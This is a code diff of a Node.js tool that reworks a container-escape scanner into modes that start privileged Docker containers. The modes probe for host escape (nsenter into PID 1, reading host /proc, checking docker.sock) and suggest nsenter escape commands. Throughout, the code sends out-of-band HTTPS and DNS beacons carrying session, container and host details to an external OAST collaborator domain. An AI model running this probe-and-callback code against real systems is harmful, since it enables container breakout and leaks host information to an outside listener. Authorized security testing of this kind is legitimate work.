-    for (let i = 0; i < this.scanners.length; i += batchSize) {
-      const batch = this.scanners.slice(i, i + batchSize);
-      console.log(`📊 Batch ${Math.floor(i/batchSize) + 1}: Scanning ${batch.length} containers...`);
-      const batchPromises = batch.map(scanner =>
-        scanner.scan().catch(error => {
-          console.error(`Failed to scan ${scanner.shortId}:`, error.message);
-          return scanner.info;
-        })
-      );
-      const batchResults = await Promise.all(batchPromises);
-      this.results.push(...batchResults);
-      // Show progress
-      const scanned = Math.min(i + batchSize, this.scanners.length);
-      const percent = Math.round((scanned / this.scanners.length) * 100);
-      console.log(`📈 Progress: ${scanned}/${this.scanners.length} (${percent}%)\n`);
+    if (this.evidence.hostInfo.hostname) {
+      console.log(`\n🖥️  Host Information:`);
+      console.log(`   Hostname: ${this.evidence.hostInfo.hostname}`);
     }
-    return this.results;
-  }
-  async generateReport() {
-    console.log('\n' + '═'.repeat(80));
-    console.log('📊 MULTI-CONTAINER ESCAPE SCAN REPORT');
-    console.log('═'.repeat(80));
+    console.log(`\n📡 OAST Interactions: ${this.oastReporter.interactions.length} interactions sent`);
+    console.log(`   DNS: ${this.oastReporter.interactions.filter(i => i.type === 'DNS').length}`);
+    console.log(`   HTTPS: ${this.oastReporter.interactions.filter(i => i.type === 'HTTPS').length}`);
-    const report = {
-      metadata: {
-        timestamp: new Date().toISOString(),
-        sessionId: CONFIG.OAST.sessionId,
-        scanDuration: Date.now() - STATE.startTime,
-        config: CONFIG
-      },
-      statistics: STATE.statistics,
-      oast: {
-        domain: CONFIG.OAST.domain,
-        interactions: STATE.oastInteractions.length,
-        session: CONFIG.OAST.sessionId
-      },
-      containers: this.results,
-      summary: this.generateSummary()
-    };
-    // Print summary
-    this.printSummary(report.summary);
-    // Save report if enabled
-    if (CONFIG.OUTPUT.saveReports) {
-      await this.saveReport(report);
-    }
+    console.log('\n🔍 Check your OAST dashboard for detailed evidence:');
+    console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
+    console.log(`   Look for interactions at: ${CONFIG.OAST.domain}`);
-    return report;
+    console.log('\n' + '='.repeat(80));
+    console.log('🎯 ANALYSIS COMPLETE');
+    console.log('='.repeat(80));
   }
-  generateSummary() {
-    const summary = {
-      totalScanned: STATE.statistics.scannedContainers,
-      escapedContainers: [],
-      vulnerableContainers: [],
-      criticalIssues: [],
-      recommendations: []
-    };
-    this.results.forEach(container => {
-      if (container.escapeStatus === 'confirmed' || container.escapeStatus === 'probable') {
-        summary.escapedContainers.push({
-          id: container.id.substring(0, 12),
-          name: container.name,
-          confidence: container.confidence,
-          methods: container.methods,
-          risk: container.risk
-        });
-      }
+  async cleanup() {
+    if (this.containerId) {
+      console.log('\n🧹 Cleaning up container...');
-      if (container.vulnerabilities.length > 0) {
-        summary.vulnerableContainers.push({
-          id: container.id.substring(0, 12),
-          name: container.name,
-          vulnerabilities: container.vulnerabilities
-        });
-      }
-      if (container.risk === 'critical') {
-        summary.criticalIssues.push({
-          id: container.id.substring(0, 12),
-          name: container.name,
-          evidence: container.evidence.slice(0, 3)
+      try {
+        await this.execOnHost(`docker stop ${this.containerId}`);
+        await this.execOnHost(`docker rm ${this.containerId}`);
+        console.log('✅ Container cleaned up');
+        // إرسال إشعار التنظيف إلى OAST
+        this.oastReporter.sendHTTPS('/cleanup', {
+          containerId: this.containerId.substring(0, 12),
+          action: 'container_removed'
         });
+      } catch (error) {
+        console.log(`⚠️  Could not clean up container: ${error.message}`);
       }
-    });
-    // Generate recommendations
-    if (summary.escapedContainers.length > 0) {
-      summary.recommendations.push(
-        `Immediate action required: ${summary.escapedContainers.length} containers can escape to host`
-      );
-    }
-    if (summary.criticalIssues.length > 0) {
-      summary.recommendations.push(
-        `Critical vulnerabilities found in ${summary.criticalIssues.length} containers`
-      );
-    }
-    if (summary.vulnerableContainers.length > 0) {
-      summary.recommendations.push(
-        `Update kernel/software in ${summary.vulnerableContainers.length} containers`
-      );
-    }
-    if (summary.escapedContainers.length === 0) {
-      summary.recommendations.push('No critical escape vectors detected. Regular security maintenance recommended.');
-    }
-    return summary;
-  }
-  printSummary(summary) {
-    console.log('\n📈 SCAN STATISTICS:');
-    console.log('   Total containers scanned:', summary.totalScanned);
-    console.log('   Containers that can escape:', summary.escapedContainers.length);
-    console.log('   Vulnerable containers:', summary.vulnerableContainers.length);
-    console.log('   Critical issues:', summary.criticalIssues.length);
-    if (summary.escapedContainers.length > 0) {
-      console.log('\n🚨 CRITICAL - CONTAINERS THAT CAN ESCAPE:');
-      summary.escapedContainers.forEach((container, i) => {
-        console.log(`   ${i + 1}. ${container.name || container.id}`);
-        console.log(`      Confidence: ${container.confidence}% | Risk: ${container.risk.toUpperCase()}`);
-        console.log(`      Methods: ${container.methods.join(', ')}`);
-      });
-    }
-    if (summary.criticalIssues.length > 0) {
-      console.log('\n⚠️  CRITICAL VULNERABILITIES:');
-      summary.criticalIssues.forEach((issue, i) => {
-        console.log(`   ${i + 1}. ${issue.name || issue.id}`);
-        issue.evidence.forEach(ev => console.log(`      - ${ev}`));
-      });
-    }
-    console.log('\n💡 RECOMMENDATIONS:');
-    summary.recommendations.forEach((rec, i) => {
-      console.log(`   ${i + 1}. ${rec}`);
-    });
-    console.log('\n📡 OAST REPORTING:');
-    console.log(`   Domain: ${CONFIG.OAST.domain}`);
-    console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
-    console.log(`   Interactions sent: ${STATE.oastInteractions.length}`);
-    console.log(`   Check OAST for detailed evidence: https://oastify.com`);
-    console.log('\n' + '═'.repeat(80));
-    console.log('🎯 SCAN COMPLETE');
-    if (summary.escapedContainers.length > 0) {
-      console.log('🚨 SECURITY ALERT: Container escape vectors detected!');
-      console.log('🔒 Immediate remediation required.');
-    } else {
-      console.log('✅ No critical escape vectors detected.');
-      console.log('🛡️  Regular security monitoring recommended.');
     }
-    console.log('═'.repeat(80));
   }
-  async saveReport(report) {
-    const timestamp = new Date().toISOString().replace(/[:.]/g, '-');
-    const filename = `multi-container-scan-${timestamp}.json`;
-    try {
-      fs.writeFileSync(filename, JSON.stringify(report, null, 2));
-      console.log(`\n💾 Full report saved to: ${filename}`);
-      // Also save a summary file
-      const summaryFilename = `scan-summary-${timestamp}.txt`;
-      let summaryText = `MULTI-CONTAINER ESCAPE SCAN SUMMARY\n`;
-      summaryText += `Date: ${new Date().toLocaleString()}\n`;
-      summaryText += `Session ID: ${CONFIG.OAST.sessionId}\n\n`;
-      summaryText += `STATISTICS:\n`;
-      summaryText += `  Total containers: ${report.statistics.totalContainers}\n`;
-      summaryText += `  Escaped containers: ${report.summary.escapedContainers.length}\n`;
-      summaryText += `  Critical issues: ${report.summary.criticalIssues.length}\n\n`;
-      if (report.summary.escapedContainers.length > 0) {
-        summaryText += `CRITICAL CONTAINERS:\n`;
-        report.summary.escapedContainers.forEach(container => {
-          summaryText += `  - ${container.name || container.id} (${container.confidence}%)\n`;
-        });
-        summaryText += '\n';
+  execInContainer(command) {
+    return new Promise((resolve, reject) => {
+      if (!this.containerId) {
+        reject(new Error('No container running'));
+        return;
       }
-      summaryText += `OAST DETAILS:\n`;
-      summaryText += `  Domain: ${CONFIG.OAST.domain}\n`;
-      summaryText += `  Session: ${CONFIG.OAST.sessionId}\n`;
-      summaryText += `  Interactions: ${STATE.oastInteractions.length}\n`;
-      fs.writeFileSync(summaryFilename, summaryText);
-      console.log(`📝 Summary saved to: ${summaryFilename}`);
-    } catch (error) {
-      console.error('❌ Failed to save report:', error.message);
-    }
+      exec(`docker exec ${this.containerId} sh -c "${command.replace(/"/g, '\\"')}"`,
+        { timeout: 10000 },
+        (error, stdout, stderr) => {
+          if (error) {
+            reject(error);
+          } else {
+            resolve(stdout || stderr || '');
+          }
+        }
+      );
+    });
   }
-  exec(command) {
+  execOnHost(command) {
     return new Promise((resolve, reject) => {
       exec(command, { timeout: 10000 }, (error, stdout, stderr) => {
         if (error) {
           reject(error);
         } else {
-          resolve(stdout.toString().trim());
+          resolve(stdout);
         }
       });
     });
   }
 }
-// ===================== MAIN EXECUTION =====================
-async function main() {
-  console.log('🚀 Starting Multi-Container Escape Scanner...\n');
-  console.log('⚙️  Configuration:');
-  console.log(`   OAST Domain: ${CONFIG.OAST.domain}`);
-  console.log(`   Session ID: ${CONFIG.OAST.sessionId}`);
-  console.log(`   Parallel scans: ${CONFIG.SCAN.parallelScans}`);
-  console.log(`   Deep scan: ${CONFIG.SCAN.deepScan ? 'Yes' : 'No'}`);
+// ===================== SIMPLE VERSION =====================
+function runSimplePrivilegedWithOAST() {
+  console.log('🚀 Running simple privileged container with OAST reporting...\n');
-  // Initial OAST ping
-  console.log('\n📡 Sending initial OAST ping...');
-  try {
-    const req = https.request({
+  const containerName = `simple-priv-${Date.now()}`;
+  const sessionId = `simple-${Date.now()}-${crypto.randomBytes(4).toString('hex')}`;
+  // إرسال بداية الجلسة
+  const startReq = https.request({
+    hostname: CONFIG.OAST.domain,
+    port: CONFIG.OAST.httpsPort,
+    path: '/simple-start',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-Session-ID': sessionId
+    }
+  });
+  startReq.write(JSON.stringify({
+    action: 'simple_container_start',
+    containerName: containerName,
+    timestamp: new Date().toISOString()
+  }));
+  startReq.end();
+  // تشغيل الحاوية
+  const dockerArgs = [
+    'run',
+    '--privileged',
+    '--name', containerName,
+    '--rm',
+    CONFIG.DOCKER.image,
+    'sh', '-c',
+    `
+    echo "=== PRIVILEGED CONTAINER STARTED ==="
+    echo "Session: ${sessionId}"
+    echo "Hostname: $(hostname)"
+    echo "User: $(whoami)"
+    echo "=== TESTING ESCAPE ==="
+    # Test nsenter
+    which nsenter && echo "nsenter: AVAILABLE" || echo "nsenter: NOT_AVAILABLE"
+    # Test host access
+    cat /proc/1/status 2>/dev/null | head -2 && echo "Host proc: ACCESSIBLE" || echo "Host proc: NO_ACCESS"
+    # Send DNS notification
+    nslookup ${sessionId}.simple-test.${CONFIG.OAST.domain} 2>/dev/null || echo "DNS test"
+    echo "=== CONTAINER COMPLETE ==="
+    `
+  ];
+  console.log(`Running: docker ${dockerArgs.join(' ')}`);
+  const dockerProcess = spawn('docker', dockerArgs, { stdio: 'inherit' });
+  dockerProcess.on('close', (code) => {
+    console.log(`\n✅ Container exited with code: ${code}`);
+    // إرسال إشعار الانتهاء
+    const endReq = https.request({
       hostname: CONFIG.OAST.domain,
       port: CONFIG.OAST.httpsPort,
-      path: '/scan-start',
+      path: '/simple-end',
       method: 'POST',
       headers: {
         'Content-Type': 'application/json',
-        'X-Session-ID': CONFIG.OAST.sessionId
+        'X-Session-ID': sessionId
       }
     });
-    req.write(JSON.stringify({
-      action: 'scan_start',
-      timestamp: new Date().toISOString(),
-      config: {
-        parallelScans: CONFIG.SCAN.parallelScans,
-        maxContainers: CONFIG.SCAN.maxContainers
-      }
+    endReq.write(JSON.stringify({
+      action: 'simple_container_end',
+      exitCode: code,
+      timestamp: new Date().toISOString()
     }));
-    req.end();
-  } catch (e) {}
+    endReq.end();
+    console.log(`\n📡 Check OAST for interactions: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Session ID: ${sessionId}`);
+  });
+}
+// ===================== INTERACTIVE VERSION =====================
+function runInteractivePrivileged() {
+  console.log('🚀 Running interactive privileged container...\n');
+  console.log(`📡 OAST Domain: ${CONFIG.OAST.domain}`);
+  console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
-  // Create scanner and run
-  const scanner = new MultiContainerScanner();
+  // إرسال إشعار البدء
+  const req = https.request({
+    hostname: CONFIG.OAST.domain,
+    port: CONFIG.OAST.httpsPort,
+    path: '/interactive-start',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-Session-ID': CONFIG.OAST.sessionId
+    }
+  });
+  req.write(JSON.stringify({
+    action: 'interactive_container_start',
+    timestamp: new Date().toISOString(),
+    command: 'docker run --privileged -it ubuntu:latest /bin/bash'
+  }));
+  req.end();
+  // تشغيل الحاوية التفاعلية
+  console.log('💻 Starting interactive bash session...');
+  console.log('   You can test commands manually.');
+  console.log('   Try these commands to test escape:');
+  console.log('   - nsenter --target 1 --mount -- sh -c "hostname"');
+  console.log('   - cat /proc/1/status');
+  console.log('   - ls -la /var/run/docker.sock');
+  console.log('   - nslookup test.${CONFIG.OAST.sessionId}.${CONFIG.OAST.domain}\n');
+  const dockerProcess = spawn('docker', [
+    'run',
+    '--privileged',
+    '-it',
+    '--name', `interactive-${CONFIG.OAST.sessionId}`,
+    CONFIG.DOCKER.image,
+    CONFIG.DOCKER.command
+  ], {
+    stdio: 'inherit'
+  });
-  try {
-    // Discover containers
-    const containerIds = await scanner.discoverContainers();
+  dockerProcess.on('close', (code) => {
+    console.log(`\n🔚 Container exited with code: ${code}`);
-    if (containerIds.length === 0) {
-      console.log('No containers to scan. Exiting.');
-      process.exit(0);
-    }
+    // إرسال إشعار الانتهاء
+    const endReq = https.request({
+      hostname: CONFIG.OAST.domain,
+      port: CONFIG.OAST.httpsPort,
+      path: '/interactive-end',
+      method: 'POST',
+      headers: {
+        'Content-Type': 'application/json',
+        'X-Session-ID': CONFIG.OAST.sessionId
+      }
+    });
-    // Scan containers
-    const results = await scanner.scanContainers(containerIds);
+    endReq.write(JSON.stringify({
+      action: 'interactive_container_end',
+      exitCode: code,
+      timestamp: new Date().toISOString()
+    }));
+    endReq.end();
-    // Generate report
-    const report = await scanner.generateReport();
+    // تنظيف
+    exec(`docker rm interactive-${CONFIG.OAST.sessionId} 2>/dev/null || true`);
-    // Send final report to OAST
-    console.log('\n📡 Sending final report to OAST...');
-    try {
-      const finalReq = https.request({
-        hostname: CONFIG.OAST.domain,
-        port: CONFIG.OAST.httpsPort,
-        path: '/scan-complete',
-        method: 'POST',
-        headers: {
-          'Content-Type': 'application/json',
-          'X-Session-ID': CONFIG.OAST.sessionId,
-          'X-Final-Report': 'true'
-        }
-      });
-      finalReq.write(JSON.stringify({
-        action: 'scan_complete',
-        timestamp: new Date().toISOString(),
-        statistics: report.statistics,
-        summary: report.summary,
-        sessionId: CONFIG.OAST.sessionId
-      }));
-      finalReq.end();
-      console.log('✅ Final report sent to OAST.');
-    } catch (e) {
-      console.log('⚠️  Could not send final report to OAST (may be expected)');
-    }
-    // Exit with appropriate code
-    if (report.summary.escapedContainers.length > 0) {
-      console.log('\n⚠️  Exiting with warning code (containers can escape)');
-      process.exit(2);
-    } else {
-      console.log('\n✅ Scan completed successfully.');
-      process.exit(0);
+    console.log(`\n📡 Check OAST interactions at: ${CONFIG.OAST.domain}`);
+    console.log(`🔑 Use Session ID: ${CONFIG.OAST.sessionId}`);
+  });
+  // التعامل مع Ctrl+C
+  process.on('SIGINT', () => {
+    console.log('\n\n⚠️  Received Ctrl+C, cleaning up...');
+    dockerProcess.kill('SIGINT');
+  });
+}
+// ===================== MAIN FUNCTION =====================
+async function main() {
+  console.log('🎯 Choose scanning method:');
+  console.log('   1. Full analysis with automated scanning and OAST reporting');
+  console.log('   2. Simple container with basic OAST reporting');
+  console.log('   3. Interactive privileged container (docker run --privileged -it ubuntu:latest /bin/bash)');
+  console.log('   4. Exit');
+  const readline = require('readline').createInterface({
+    input: process.stdin,
+    output: process.stdout
+  });
+  readline.question('\nSelect option: ', async (choice) => {
+    readline.close();
+    switch(choice.trim()) {
+      case '1':
+        const scanner = new PrivilegedContainerScanner();
+        await scanner.run();
+        break;
+      case '2':
+        runSimplePrivilegedWithOAST();
+        break;
+      case '3':
+        runInteractivePrivileged();
+        break;
+      default:
+        console.log('👋 Exiting');
+        process.exit(0);
     }
-  } catch (error) {
-    console.error('\n❌ Scan failed:', error.message);
-    process.exit(1);
-  }
+  });
 }
-// ===================== EXECUTE =====================
+// ===================== CHECK DOCKER =====================
 if (require.main === module) {
-  // Check if Docker is available
+  // التحقق من Docker
   exec('which docker', (error) => {
     if (error) {
-      console.error('❌ Docker is not available or not in PATH.');
-      console.error('   This tool requires Docker to be installed and accessible.');
+      console.error('❌ Docker is not installed or not in PATH');
       process.exit(1);
     }
-    // Check if we have permission to run docker commands
     exec('docker ps', (error) => {
       if (error && error.message.includes('permission denied')) {
-        console.error('❌ Permission denied for Docker commands.');
-        console.error('   Try running with sudo or add your user to docker group.');
+        console.error('❌ Permission denied for Docker');
+        console.log('   Try: sudo usermod -aG docker $USER');
+        console.log('   Then logout and login again');
         process.exit(1);
       }
-      // Start the scan
+      console.log(`✅ Docker is available`);
+      console.log(`📍 OAST Domain: ${CONFIG.OAST.domain}`);
+      console.log(`🔑 Session ID: ${CONFIG.OAST.sessionId}\n`);
+      // بدء البرنامج
       main();
     });
   });
 }
-module.exports = { MultiContainerScanner, ContainerScanner };
+module.exports = { PrivilegedContainerScanner, CONFIG };